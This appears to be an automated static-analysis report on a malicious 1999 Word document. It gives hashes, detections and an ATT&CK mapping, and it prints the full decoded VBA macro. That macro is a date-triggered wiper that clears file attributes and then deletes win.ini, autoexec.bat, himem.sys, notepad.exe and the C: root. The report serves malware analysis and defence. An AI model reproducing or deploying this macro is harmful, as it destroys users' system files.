Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 5c6504eb3a5553a3…

MALICIOUS

Office (OLE)

26.0 KB Created: 1999-05-30 01:01:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: be2d07330c9689269d80f8e8108122d8 SHA-1: c52b4179804a22f50f99b99b5adf11a0ce563303 SHA-256: 5c6504eb3a5553a365db0de0e857aca314414bf45436c9fd3f09180986f61633
140 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample is a Microsoft Word document containing VBA macros. The 'Form_Load' subroutine within the macros attempts to delete several critical system files including 'c:\windows\win.ini', 'c:\autoexec.bat', 'c:\windows\himem.sys', and 'c:\windows\notepad.exe'. This behavior is indicative of a destructive payload, commonly associated with wipers or destructive malware.

Heuristics 2

  • ClamAV: Doc.Trojan.Neo-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Neo-1
  • VBA macros detected medium OLE_VBA_MACROS
    Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 744 bytes
SHA-256: fcec8c8f72db10aa8687c8134eafff21d9bf441ce5640f9abf505fabf56b5b13
Detection
ClamAV: Doc.Trojan.Neo-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Form_Load()
form1.Hide
If Date$ > "07-04-2000" Then GoTo del Else
If Year(Now) > 1999 Then End
Else
Date$ = "05-30-1999"
End
del:
file1 = "c:\windows\win.ini"
file2 = "c:\autoexec.bat"
file3 = "c:\windows\himem.sys"
file4 = "c:\windows\notepad.exe"
file5 = "c:\"
On Error Resume Next
SetAttr file1, 0
SetAttr file2, 0
SetAttr file3, 0
SetAttr file4, 0
SetAttr file5, 0
Kill file1
Kill file2
Kill file3
Kill file4
Kill file5
End
'The Chaos Virus
'By: Neo
End Sub